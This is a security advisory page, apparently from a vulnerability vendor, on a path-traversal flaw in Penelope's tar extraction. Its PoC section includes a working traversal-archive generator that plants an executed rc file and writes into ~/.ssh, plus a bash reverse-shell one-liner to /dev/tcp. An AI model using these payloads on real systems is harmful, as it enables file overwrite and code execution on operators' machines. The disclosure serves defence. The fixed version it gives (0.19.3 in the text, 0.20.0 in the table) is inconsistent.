GHSA-f42x-p2mx-hm8r is a medium-severity (CVSS 5.9) Path Traversal vulnerability in penelope-shell-handler. O3 Security confirms whether GHSA-f42x-p2mx-hm8r is actually reachable in your code before you act, and blocks exploitation at runtime until you patch.
Penelope unsafe tar extraction allows arbitrary local file write via crafted session archive
Exploitation Status
Proof-of-concept exploit code exists
- CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
Exploitation and automatability from CISA’s SSVC triage for GHSA-f42x-p2mx-hm8r.
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
How urgent is this, really
GHSA-f42x-p2mx-hm8r plotted by exploitation likelihood (EPSS) against impact (CVSS). The shaded corner — EPSS 50%+ and CVSS 7.0+ — is where this CVE doesn't sit, though severity or exploitability alone can still warrant action.
Where this sits among everything scored
Of 372,324 CVEs with a current EPSS score, this one falls in the < 10% band (highlighted). Real counts from FIRST.org, not a sample — log-scaled since the landscape is heavily right-skewed.
Real-World Exposure
penelope-shell-handlerReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Summary
Penelope versions prior to 0.19.3 extracted tar archives received from remote sessions without validating archive member paths. When using the affected Unix download path, a malicious or compromised remote session could return a crafted tar archive containing path traversal entries, such as ../, causing files to be written outside the intended download directory on the Penelope operator's machine.
The impact is limited to files writable by the user running Penelope. In some cases, this arbitrary file write could be chained to operator-side code execution if the attacker can overwrite a file that Penelope or the user later executes, such as ~/.penelope/peneloperc. The issue has been fixed in version 0.19.3 by rejecting unsafe archive paths during extraction.
Affected conditions
The issue requires the operator to use the Main Menu download command to download files from a malicious or compromised remote session that can influence the tar archive returned to Penelope. The Python agent download path is not affected in the same way because it does not rely on the remote tar command.
The vulnerable behavior is related to Python's historical tarfile extraction defaults. In Python versions before 3.14, TarFile.extractall() did not use the safer data extraction filter by default, so applications extracting untrusted tar archives needed to explicitly provide a safe extraction filter or perform their own path validation.
Python 3.14 changes the default extraction behavior to use the data filter, which rejects dangerous archive features such as absolute paths and paths outside the destination directory. Penelope 0.19.3 now performs explicit validation/rejection of unsafe archive paths so the fix does not depend on the Python runtime version.
Details
The vulnerable code is in the Unix download() implementation.
Penelope creates a local download directory:
local_download_folder = self.directory / "downloads"
Later, it opens a tar archive received from the remote session:
tar = tarfile.open(mode=mode, fileobj=tar_source)
Then it extracts all members without validating archive paths:
tar.extractall(local_download_folder)
Because member names are trusted, a malicious tar archive can contain paths such as:
../../../../../home/operator/.penelope/peneloperc
This escapes the intended local_download_folder and writes to an arbitrary path writable by the Penelope operator.
The same extraction block also suppresses Python's DeprecationWarning around unsafe tar extraction:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=DeprecationWarning)
tar.extractall(local_download_folder)
The file-write impact can be chained with Penelope's rc loading behavior:
def load_rc():
RC = Path(options.basedir / "peneloperc")
try:
with open(RC, "r") as rc:
exec(rc.read(), globals())
By default, options.basedir is ~/.penelope, so the executed rc file is:
~/.penelope/peneloperc
Since session downloads are stored under ~/.penelope/sessions/<session>/downloads, a crafted tar member can traverse upward and plant or replace ~/.penelope/peneloperc. The planted Python code executes when Penelope starts again or when the operator runs reload.
PoC
The following reproduces the issue locally by simulating a malicious remote endpoint. The fake tar binary is placed first in PATH for the test shell, so when Penelope asks the remote session to run tar, the remote session returns a crafted archive with path traversal entries.
Start Penelope in Terminal 1:
penelope -p 4444 -U -C #No upgrade and session connection needed
<img width="1920" height="337" alt="path1" src="https://github.com/user-attachments/assets/c8cb2dd6-e6d5-43ce-b3a2-61005dbcf95c" />
Prepare the fake remote tar in Terminal 2:
mkdir -p /tmp/penelope-fakebin
mkdir -p "$HOME/.penelope" "$HOME/.ssh"
cp -f "$HOME/.penelope/peneloperc" /tmp/peneloperc.backup 2>/dev/null || true
cat > /tmp/penelope-fakebin/tar <<'EOF'
#!/usr/bin/env python3
import io
import os
import sys
import tarfile
import time
home = os.path.expanduser("~")
target_home = home.lstrip("/")
def add_file(tar, target, data):
data = data.encode()
info = tarfile.TarInfo(target)
info.size = len(data)
info.mode = 0o644
info.mtime = int(time.time())
tar.addfile(info, io.BytesIO(data))
with tarfile.open(mode="w:gz", fileobj=sys.stdout.buffer) as tar:
add_file(tar, "../../../../../" + target_home + "/PENELOPE_CVE_PROOF.txt", "Penelope path traversal proof\n")
add_file(tar, "../../../../../" + target_home + "/.ssh/PENELOPE_SSH_KEY.txt", "fake-demo-ssh_key-not-for-authentication\n")
add_file(
tar,
"../../../../../" + target_home + "/.penelope/peneloperc",
"open('/" + target_home + "/PENELOPE_RC_EXECUTED.txt', 'w').write('peneloperc executed via reload\\n')\n"
)
EOF
chmod +x /tmp/penelope-fakebin/tar
touch /tmp/penelope_dummy
Connect the local test shell back to Penelope in Terminal 2:
PATH=/tmp/penelope-fakebin:$PATH bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'
<img width="1920" height="1000" alt="path2" src="https://github.com/user-attachments/assets/c6db4888-9a41-4a99-b8d1-35c06f07ca4a" />
In Terminal 1, inside Penelope, trigger the vulnerable download:
download /tmp/penelope_dummy
Verify in Terminal 3 that files were written outside the intended download directory:
cat "$HOME/PENELOPE_CVE_PROOF.txt"
cat "$HOME/.ssh/PENELOPE_SSH_KEY.txt"
grep PENELOPE_RC_EXECUTED "$HOME/.penelope/peneloperc"
<img width="1920" height="573" alt="path3" src="https://github.com/user-attachments/assets/9c7c8d3b-00ee-4d74-b195-1e91ff581243" />
Expected output includes:
Penelope path traversal proof
fake-demo-ssh_key-not-for-authentication
open('/home/<user>/PENELOPE_RC_EXECUTED.txt', 'w').write('peneloperc executed via reload\n')
In Terminal 1, inside Penelope, execute the planted rc line:
reload
Verify in Terminal 3 that peneloperc executed:
cat "$HOME/PENELOPE_RC_EXECUTED.txt"
Expected output:
peneloperc executed via reload
Cleanup:
rm -f "$HOME/PENELOPE_CVE_PROOF.txt"
rm -f "$HOME/.ssh/PENELOPE_SSH_KEY.txt"
rm -f "$HOME/PENELOPE_RC_EXECUTED.txt"
if [ -f /tmp/peneloperc.backup ]; then cp -f /tmp/peneloperc.backup "$HOME/.penelope/peneloperc"; else rm -f "$HOME/.penelope/peneloperc"; fi
rm -f /tmp/peneloperc.backup
rm -rf /tmp/penelope-fakebin
rm -f /tmp/penelope_dummy
Impact
A malicious remote session can write arbitrary files on the Penelope operator's machine, limited to the permissions of the user running Penelope.
For a non-root operator, this may be chained to operator-side code execution only if the attacker can overwrite a user-writable file that Penelope or the user later executes, such as:
~/.penelope/peneloperc
~/.bashrc
~/.profile
~/.config/autostart/*.desktop
For a root operator, the impact is higher because root-writable files may be overwritten.
Suggested Fix
Validate every archive member before extraction by resolving the final destination path and rejecting paths outside the intended download directory. Reject symlink and hardlink members. On supported Python versions, filter="data" can be used as an additional safeguard.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | penelope-shell-handler | all versions | 0.20.0 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for penelope-shell-handler. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update penelope-shell-handler to 0.20.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-f42x-p2mx-hm8r is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-f42x-p2mx-hm8r is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-f42x-p2mx-hm8r. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-f42x-p2mx-hm8r in your dependencies?
O3 detects GHSA-f42x-p2mx-hm8r across PyPI dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.